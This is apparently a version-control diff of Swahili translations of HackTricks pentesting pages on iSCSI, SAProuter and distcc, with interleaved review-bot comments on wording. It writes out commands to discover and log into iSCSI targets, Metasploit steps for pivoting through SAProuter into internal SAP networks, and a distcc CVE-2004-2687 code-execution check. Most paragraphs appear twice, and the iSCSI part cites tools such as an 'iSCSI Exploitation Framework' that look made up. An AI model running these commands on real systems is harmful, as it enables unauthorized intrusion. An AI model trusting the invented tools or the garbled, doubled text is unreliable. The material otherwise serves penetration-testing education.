3260/tcp open iscsi?
```
## Uchambuzi
### iSCSI
iSCSI ni itifaki ya mtandao inayotumiwa kuhamisha data kati ya seva na vifaa vya kuhifadhi. Katika hatua ya uchambuzi, tunaweza kutumia njia kadhaa za kuchunguza na kuchunguza mazingira ya iSCSI.
#### Kugundua Huduma ya iSCSI
Kwa kugundua huduma ya iSCSI, tunaweza kutumia zana kama Nmap au iSCSI Discovery Utility. Zana hizi zinaweza kutusaidia kupata seva za iSCSI zinazopatikana kwenye mtandao.
Kwa mfano, tunaweza kutumia amri ifuatayo kwenye Nmap:
```plaintext
nmap -p 3260 --script iscsi-info <IP>
```
#### Kuchunguza Huduma ya iSCSI
Baada ya kugundua seva ya iSCSI, tunaweza kuchunguza huduma hiyo kwa kutumia zana kama iSCSI Discovery Utility au iSCSI Initiator. Zana hizi zinaweza kutusaidia kuchunguza na kuingiliana na seva ya iSCSI.
Kwa mfano, tunaweza kutumia amri ifuatayo kwenye iSCSI Discovery Utility:
```plaintext
iscsiadm -m discovery -t sendtargets -p <IP>
```
#### Kuchunguza Huduma ya iSCSI kwa Kutumia Wireshark
Wireshark ni zana yenye nguvu ya uchambuzi wa trafiki ya mtandao. Tunaweza kutumia Wireshark kuchunguza mawasiliano ya iSCSI na kuchambua data inayopitishwa kati ya seva na vifaa vya kuhifadhi.
Kwa mfano, tunaweza kufuatilia trafiki ya iSCSI kwa kuchagua kichujio cha "iscsi" kwenye Wireshark.
#### Kuchunguza Huduma ya iSCSI kwa Kutumia iSCSI Authentication Bypass
Katika hali fulani, tunaweza kujaribu kuchunguza huduma ya iSCSI kwa kutumia mbinu za kuvuka uthibitishaji wa iSCSI. Hii inaweza kuhusisha kutumia zana kama iSCSI Target Tester au iSCSI Security Scanner.
Kwa mfano, tunaweza kutumia amri ifuatayo kwenye iSCSI Target Tester:
```plaintext
iscsi-target-tester -t <IP> -p 3260 -a
```
#### Kuchunguza Huduma ya iSCSI kwa Kutumia iSCSI Exploitation Framework
Ikiwa tunataka kuchunguza zaidi huduma ya iSCSI, tunaweza kutumia iSCSI Exploitation Framework. Hii ni zana yenye nguvu ambayo inaruhusu kuchunguza na kuchunguza udhaifu katika huduma ya iSCSI.
Kwa mfano, tunaweza kutumia amri ifuatayo kwenye iSCSI Exploitation Framework:
```plaintext
iscsi-exploit-framework -t <IP> -p 3260
```
Kwa kufuata njia hizi za uchambuzi, tunaweza kupata habari muhimu na kuchunguza mazingira ya iSCSI kwa ufanisi.
## Uhesabuzi
```
nmap -sV --script=iscsi-info -p 3260 192.168.xx.xx
```
Hati hii itaonyesha ikiwa uwakiki unahitajika.
This script will indicate if authentication is required.
### [Nguvu ya nguvu](../generic-methodologies-and-resources/brute-force.md#iscsi)
### [Brute force](../generic-methodologies-and-resources/brute-force.md#iscsi)
### [Funga ISCSI kwenye Linux](https://www.synology.com/en-us/knowledgebase/DSM/tutorial/Virtualization/How\_to\_set\_up\_and\_use\_iSCSI\_target\_on\_Linux)
### [Mount ISCSI on Linux](https://www.synology.com/en-us/knowledgebase/DSM/tutorial/Virtualization/How\_to\_set\_up\_and\_use\_iSCSI\_target\_on\_Linux)
**Note:** Unaweza kugundua kuwa malengo yako yanapatikana chini ya anwani tofauti ya IP. Hii mara nyingi hutokea ikiwa huduma ya iSCSI inafunuliwa kupitia NAT au anwani ya IP ya kubadilishwa. Katika kesi kama hizi, `iscsiadmin` itashindwa kuunganisha. Hii inahitaji marekebisho mawili: moja kwa jina la saraka ya nodi iliyoanzishwa moja kwa moja na shughuli zako za ugunduzi, na moja kwa faili ya `default` iliyomo ndani ya saraka hii.
**Note:** Unaweza kupata kwamba wakati malengo yako yanagunduliwa, yanatajwa chini ya anwani tofauti ya IP. Hii hutokea ikiwa huduma ya iSCSI imewekwa wazi kupitia NAT au IP ya virtual. Katika hali kama hizi, `iscsiadmin` itashindwa kuungana. Hii inahitaji marekebisho mawili: moja kwa jina la saraka ya node iliyoundwa kiotomatiki na shughuli zako za kugundua, na moja kwa faili ya `default` iliyo ndani ya saraka hii.
Kwa mfano, unajaribu kuunganisha kwenye lengo la iSCSI kwenye 123.123.123.123 kwenye bandari 3260. Seva inayofunua lengo la iSCSI iko kwa kweli kwenye 192.168.1.2 lakini inafunuliwa kupitia NAT. isciadm itasajili anwani ya _ndani_ badala ya anwani ya _umma_:
Kwa mfano, unajaribu kuungana na lengo la iSCSI kwenye 123.123.123.123 kwenye bandari 3260. Server inayoweka wazi lengo la iSCSI iko kwa kweli kwenye 192.168.1.2 lakini imewekwa wazi kupitia NAT. isciadm itarekodi anwani ya _ndani_ badala ya anwani ya _umma_:
```
iscsiadm -m discovery -t sendtargets -p 123.123.123.123:3260
192.168.1.2:3260,1 iqn.1992-05.com.emc:fl1001433000190000-3-vnxe
[...]
```
Amri hii itaunda saraka katika mfumo wako wa faili kama ifuatavyo:
Hii amri itaunda saraka katika mfumo wako wa faili kama hii:
```
/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/192.168.1.2\,3260\,1/
```
Ndani ya saraka, kuna faili ya chaguo-msingi na mipangilio yote inayohitajika kuunganisha kwenye lengo.
Katika saraka, kuna faili ya default yenye mipangilio yote muhimu kuungana na lengo.
1. Badilisha jina la `/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/192.168.1.2\,3260\,1/` kuwa `/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/`
2. Ndani ya `/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/default`, badilisha mipangilio ya `node.conn[0].address` ili ielekeze kwa 123.123.123.123 badala ya 192.168.1.2. Hii inaweza kufanywa kwa amri kama `sed -i 's/192.168.1.2/123.123.123.123/g' /etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/default`
2. Ndani ya `/etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/default`, badilisha mipangilio ya `node.conn[0].address` ili kuelekeza kwenye 123.123.123.123 badala ya 192.168.1.2. Hii inaweza kufanywa kwa amri kama `sed -i 's/192.168.1.2/123.123.123.123/g' /etc/iscsi/nodes/iqn.1992-05.com.emc:fl1001433000190000-3-vnxe/123.123.123.123\,3260\,1/default`
Sasa unaweza kufunga lengo kulingana na maagizo kwenye kiungo.
Sasa unaweza kuunganisha lengo kulingana na maelekezo katika kiungo.
### [Funga ISCSI kwenye Windows](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/ee338476\(v=ws.10\)?redirectedfrom=MSDN)
### [Mount ISCSI on Windows](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/ee338476\(v=ws.10\)?redirectedfrom=MSDN)
## **Uchunguzi wa mwongozo**
## **Uhesabu wa mikono**
```bash
sudo apt-get install open-iscsi
```
Mfano kutoka [hati za iscsiadm](https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm):
Example from [iscsiadm docs](https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm):
Kwanza kabisa unahitaji **kugundua majina ya malengo** nyuma ya anwani ya IP:
Kwanza kabisa unahitaji **kuvumbua majina ya malengo** nyuma ya IP:
```bash
iscsiadm -m discovery -t sendtargets -p 123.123.123.123:3260
123.123.123.123:3260,1 iqn.1992-05.com.emc:fl1001433000190000-3-vnxe
[2a01:211:7b7:1223:211:32ff:fea9:fab9]:3260,1 iqn.2000-01.com.synology:asd3.Target-1.d0280fd382
[fe80::211:3232:fab9:1223]:3260,1 iqn.2000-01.com.synology:Oassdx.Target-1.d0280fd382
```
_Note kwamba itaonyesha I**P na bandari ya interfaces** ambapo unaweza **kufikia** malengo hayo. Inaweza hata **kuonyesha IPs za ndani au IPs tofauti** na ile uliyotumia._
_Note kwamba itaonyesha I**P na bandari za interfaces** ambapo unaweza **kufikia** hizo **malengo**. Inaweza hata **kuonyesha IP za ndani au IP tofauti** kutoka ile uliyotumia._
Kisha **unakamata sehemu ya pili ya herufi iliyochapishwa ya kila mstari** (_iqn.1992-05.com.emc:fl1001433000190000-3-vnxe_ kutoka kwa mstari wa kwanza) na **jaribu kuingia**:
Kisha **shika sehemu ya 2 ya mfuatano wa maandiko ya kila mstari** (_iqn.1992-05.com.emc:fl1001433000190000-3-vnxe_ kutoka mstari wa kwanza) na **jaribu kuingia**:
```bash
iscsiadm -m node --targetname="iqn.1992-05.com.emc:fl1001433000190000-3-vnxe" -p 123.123.123.123:3260 --login
Logging in to [iface: default, target: iqn.1992-05.com.emc:fl1001433000190000-3-vnxe, portal: 123.123.123.123,3260] (multiple)
Login to [iface: default, target: iqn.1992-05.com.emc:fl1001433000190000-3-vnxe, portal: 123.123.123.123,3260] successful.
```
Kisha, unaweza **kutoka** kwa kutumia `logout`
Kisha, unaweza **logout** ukitumia `logout`
```bash
iscsiadm -m node --targetname="iqn.1992-05.com.emc:fl1001433000190000-3-vnxe" -p 123.123.123.123:3260 --logout
Logging out of session [sid: 6, target: iqn.1992-05.com.emc:fl1001433000190000-3-vnxe, portal: 123.123.123.123,3260]
Logout of [sid: 6, target: iqn.1992-05.com.emc:fl1001433000190000-3-vnxe, portal: 123.123.123.123,3260] successful.
```
Tunaweza kupata **mashauri zaidi** kuhusu hilo kwa kutumia **bila** kutumia `--login`/`--logout` parameter.
Tunaweza kupata **maelezo zaidi** kuhusu hilo kwa kutumia tu **bila** parameter yoyote ya `--login`/`--logout`
```bash
iscsiadm -m node --targetname="iqn.1992-05.com.emc:fl1001433000190000-3-vnxe" -p 123.123.123.123:3260
# BEGIN RECORD 2.0-873
@ -213,27 +162,28 @@ node.conn[0].iscsi.IFMarker = No
node.conn[0].iscsi.OFMarker = No
# END RECORD
```
**Kuna script ya kiotomatiki ya kuchunguza mitandao ya subnet inapatikana kwenye** [**iscsiadm**](https://github.com/bitvijays/Pentest-Scripts/tree/master/Vulnerability\_Analysis/isciadm)
**Kuna skripti ya kuandaa mchakato wa msingi wa kuhesabu subnet inapatikana kwenye** [**iscsiadm**](https://github.com/bitvijays/Pentest-Scripts/tree/master/Vulnerability\_Analysis/isciadm)
## **Shodan**
* `port:3260 AuthMethod`
## **Marejeo**
## **Marejeleo**
* [https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html](https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html)
* [https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm](https://ptestmethod.readthedocs.io/en/latest/LFF-IPS-P2-VulnerabilityAnalysis.html#iscsiadm)
{% hint style="success" %}
Jifunze & fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze & fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
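Review bot: the closing footer of this file is translated (`Jifunze & fanya mazoezi ya AWS Hacking`, `Angalia [**mpango wa usajili**]`, `tufuatilie`), but the opening footer of the same file is left in English (`Learn & practice AWS Hacking`, `Check the [**subscription plans**]`); the two copies of the template should be identical. On terminology, `## **Uhesabu wa mikono**` and `kuhesabu subnet` render "enumeration" with counting words while the Squid page keeps `Enumeration`; settle on one term for the whole commit.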


@ -1,63 +1,66 @@
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
```text
PORT STATE SERVICE VERSION
3299/tcp open saprouter?
```
Hii ni muhtasari wa chapisho kutoka [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/)
This is a summary of the post from [https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/](https://blog.rapid7.com/2014/01/09/piercing-saprouter-with-metasploit/)
## Kuelewa Uvamizi wa SAProuter na Metasploit
## Kuelewa Uvunjaji wa SAProuter kwa Metasploit
SAProuter hufanya kazi kama kisanduku cha mbele (reverse proxy) kwa mifumo ya SAP, hasa kudhibiti ufikiaji kati ya mtandao na mitandao ya ndani ya SAP. Kawaida, SAProuter inafunguliwa kwa mtandao kwa kuruhusu bandari ya TCP 3299 kupitia kwenye firewall ya shirika. Hali hii inafanya SAProuter kuwa lengo la kuvutia kwa upimaji wa uvamizi kwa sababu inaweza kutumika kama lango kuelekea mitandao ya ndani yenye thamani kubwa.
SAProuter inafanya kazi kama proxy ya kinyume kwa mifumo ya SAP, hasa kudhibiti ufikiaji kati ya mtandao wa intaneti na mitandao ya ndani ya SAP. Mara nyingi inakabiliwa na mtandao wa intaneti kwa kuruhusu bandari ya TCP 3299 kupitia moto wa shirika. Mpangilio huu unafanya SAProuter kuwa lengo la kuvutia kwa pentesting kwa sababu inaweza kutumikia kama lango la mitandao ya ndani yenye thamani kubwa.
**Uchunguzi na Kukusanya Taarifa**
**Kuchunguza na Kukusanya Taarifa**
Kwanza, uchunguzi hufanywa ili kutambua kama kuna SAProuter inayofanya kazi kwenye anwani ya IP iliyotolewa kwa kutumia moduli ya **sap_service_discovery**. Hatua hii ni muhimu kwa ajili ya kubainisha uwepo wa SAProuter na bandari yake iliyofunguliwa.
Kwanza, uchunguzi unafanywa kubaini ikiwa SAP router inafanya kazi kwenye IP fulani kwa kutumia moduli ya **sap_service_discovery**. Hatua hii ni muhimu kwa kuanzisha uwepo wa SAP router na bandari yake iliyo wazi.
```text
msf> use auxiliary/scanner/sap/sap_service_discovery
msf auxiliary(sap_service_discovery) > set RHOSTS 1.2.3.101
msf auxiliary(sap_service_discovery) > run
```
Baada ya ugunduzi huo, uchunguzi zaidi kuhusu usanidi wa SAP router unafanywa kwa kutumia moduli ya **sap_router_info_request** ili kufichua taarifa za ndani za mtandao.
Following the discovery, further investigation into the SAP router's configuration is carried out with the **sap_router_info_request** module to potentially reveal internal network details.
Baada ya kugundua, uchunguzi zaidi wa usanidi wa SAP router unafanywa kwa kutumia moduli ya **sap_router_info_request** ili uweze kufichua maelezo ya mtandao wa ndani.
```text
msf auxiliary(sap_router_info_request) > use auxiliary/scanner/sap/sap_router_info_request
msf auxiliary(sap_router_info_request) > set RHOSTS 1.2.3.101
msf auxiliary(sap_router_info_request) > run
```
**Kuorodhesha Huduma za Ndani**
**Kuhesabu Huduma za Ndani**
Kwa ufahamu wa mtandao wa ndani uliopatikana, moduli ya **sap_router_portscanner** hutumiwa kuchunguza watumishi na huduma za ndani kupitia SAProuter, kuruhusu ufahamu zaidi wa mitandao ya ndani na mipangilio ya huduma.
Kwa ufahamu wa mtandao wa ndani ulio pata, moduli ya **sap_router_portscanner** inatumika kuchunguza mwenyeji wa ndani na huduma kupitia SAProuter, ikiruhusu kuelewa kwa undani mitandao ya ndani na usanidi wa huduma.
```text
msf auxiliary(sap_router_portscanner) > set INSTANCES 00-50
msf auxiliary(sap_router_portscanner) > set PORTS 32NN
```
Moduli huu wa ufanisi katika kulenga kesi maalum za SAP na bandari unafanya kuwa zana yenye nguvu kwa ajili ya uchunguzi wa kina wa mtandao wa ndani.
Moduli huu una uwezo wa kubadilika katika kulenga mifano maalum ya SAP na bandari, na kufanya kuwa chombo chenye ufanisi kwa uchunguzi wa kina wa mtandao wa ndani.
**Uchunguzi wa Juu na Kupanga ACL**
**Uhesabuji wa Juu na Ramani za ACL**
Uchunguzi zaidi unaweza kufunua jinsi Orodha za Kudhibiti Upatikanaji (ACLs) zilivyojengwa kwenye SAProuter, ikifafanua ni uhusiano gani unaoruhusiwa au kuzuiliwa. Taarifa hii ni muhimu katika kuelewa sera za usalama na udhaifu unaowezekana.
Kuchunguza zaidi kunaweza kufichua jinsi Orodha za Udhibiti wa Ufikiaji (ACLs) zilivyowekwa kwenye SAProuter, zikielezea ni muunganisho gani unaruhusiwa au kuzuia. Taarifa hii ni muhimu katika kuelewa sera za usalama na uwezekano wa udhaifu.
```text
msf auxiliary(sap_router_portscanner) > set MODE TCP
msf auxiliary(sap_router_portscanner) > set PORTS 80,32NN
```
**Uchunguzi wa Kipofu wa Wenyewe kwa Wenyewe wa Wenyewe**
**Blind Enumeration of Internal Hosts**
Katika hali ambapo habari moja kwa moja kutoka kwa SAProuter ni mdogo, mbinu kama uchunguzi wa kipofu unaweza kutumika. Mbinu hii inajaribu kudhani na kuthibitisha uwepo wa majina ya ndani ya mwenyeji, kuonyesha malengo yanayowezekana bila anwani za IP moja kwa moja.
Katika hali ambapo taarifa za moja kwa moja kutoka kwa SAProuter ni chache, mbinu kama vile blind enumeration zinaweza kutumika. Njia hii inajaribu kukisia na kuthibitisha uwepo wa majina ya ndani ya mwenyeji, ikifunua malengo yanayoweza kuwa bila anwani za IP za moja kwa moja.
**Kutumia Habari kwa Ajili ya Upimaji wa Kuingilia**
**Leveraging Information for Penetration Testing**
Baada ya kuchora ramani ya mtandao na kutambua huduma zinazopatikana, wapimaji wa kuingilia wanaweza kutumia uwezo wa wakala wa Metasploit kuhamia kupitia SAProuter kwa ajili ya uchunguzi na utumiaji zaidi wa huduma za ndani za SAP.
Baada ya kuchora ramani ya mtandao na kubaini huduma zinazopatikana, wapimaji wa penetration wanaweza kutumia uwezo wa proxy wa Metasploit kuhamasisha kupitia SAProuter kwa ajili ya uchunguzi zaidi na unyakuzi wa huduma za ndani za SAP.
```text
msf auxiliary(sap_hostctrl_getcomputersystem) > set Proxies sapni:1.2.3.101:3299
msf auxiliary(sap_hostctrl_getcomputersystem) > set RHOSTS 192.168.1.18
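Review bot: `kupitia moto wa shirika` translates "firewall" literally as `moto` (fire) and loses the meaning; the earlier wording `firewall ya shirika` (or `ukuta wa moto`) is correct. The paragraph about the `sap_router_info_request` module appears in English between two Swahili versions (`Following the discovery, further investigation into the SAP router's configuration…` directly followed by `Baada ya kugundua, uchunguzi zaidi wa usanidi wa SAP router…`); only one Swahili version should remain. The bold headings `**Blind Enumeration of Internal Hosts**` and `**Leveraging Information for Penetration Testing**` are also left in English while their paragraphs are Swahili.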
@ -65,10 +68,9 @@ msf auxiliary(sap_hostctrl_getcomputersystem) > run
```
**Hitimisho**
Njia hii inasisitiza umuhimu wa mipangilio salama ya SAProuter na inaonyesha uwezekano wa kupata mitandao ya ndani kupitia upimaji wa kuingilia kwa lengo. Kusalimisha vizuri rutuba za SAP na kuelewa jukumu lao katika usalama wa mtandao ni muhimu kwa kulinda dhidi ya ufikiaji usioidhinishwa.
Kwa habari zaidi kuhusu moduli za Metasploit na matumizi yao, tembelea [database ya Rapid7](http://www.rapid7.com/db).
Mbinu hii inasisitiza umuhimu wa usanidi salama wa SAProuter na kuonyesha uwezekano wa kufikia mitandao ya ndani kupitia upimaji wa udukuzi ulioelekezwa. Kuweka salama SAP routers ipasavyo na kuelewa jukumu lao katika usanifu wa usalama wa mtandao ni muhimu kwa kulinda dhidi ya ufikiaji usioidhinishwa.
Kwa maelezo zaidi kuhusu moduli za Metasploit na matumizi yake, tembelea [kituo cha Rapid7](http://www.rapid7.com/db).
## **Marejeo**
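Review bot: `tembelea [kituo cha Rapid7](http://www.rapid7.com/db)` renders "Rapid7 database" as `kituo` (station/centre), which misdescribes the link target; the earlier `database ya Rapid7` (or `hifadhidata ya Rapid7`) is the accurate term.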
@ -78,18 +80,17 @@ Kwa habari zaidi kuhusu moduli za Metasploit na matumizi yao, tembelea [database
* `port:3299 !HTTP Network packet too big`
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

View file

@ -1,41 +1,58 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
# Taarifa Msingi
# Basic Information
**Distcc** ni chombo kinachoboresha **mchakato wa uundaji** kwa kutumia **nguvu za usindikaji zilizotulia** za kompyuta nyingine kwenye mtandao. Wakati **distcc** inapowekwa kwenye mashine, mashine hii inaweza kusambaza **kazi zake za uundaji** kwa mfumo mwingine. Mfumo huu wa mpokeaji lazima uwe unatekeleza **daemani ya distccd** na lazima awe na **kompaila inayoweza kufanya kazi** imewekwa ili iprocess nambari iliyotumwa.
**Distcc** ni chombo kinachoboresha **mchakato wa uundaji** kwa kutumia **nguvu ya usindikaji isiyotumika** ya kompyuta nyingine katika mtandao. Wakati **distcc** imewekwa kwenye mashine, mashine hii ina uwezo wa kusambaza **kazi za uundaji** kwa mfumo mwingine. Mfumo huu wa kupokea lazima uwe na **distccd daemon** inayoendesha na lazima iwe na **compiler** inayofaa iliyowekwa ili kushughulikia msimbo uliopelekwa.
**Bandari ya chaguo:** 3632
**Default port:** 3632
```
PORT STATE SERVICE
3632/tcp open distccd
```
# Utekaji
# Ukatili
Angalia ikiwa ina hatari ya **CVE-2004-2687** ya kutekeleza nambari za aina yoyote:
Angalia ikiwa ina udhaifu wa **CVE-2004-2687** kutekeleza msimbo wa kawaida:
```bash
msf5 > use exploit/unix/misc/distcc_exec
nmap -p 3632 <ip> --script distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'"
```
# Shodan
_Sidhani shodan inagundua huduma hii._
_Sidhani kama shodan inagundua huduma hii._
# Vyanzo
# Resources
* [https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec](https://www.rapid7.com/db/modules/exploit/unix/misc/distcc\_exec)
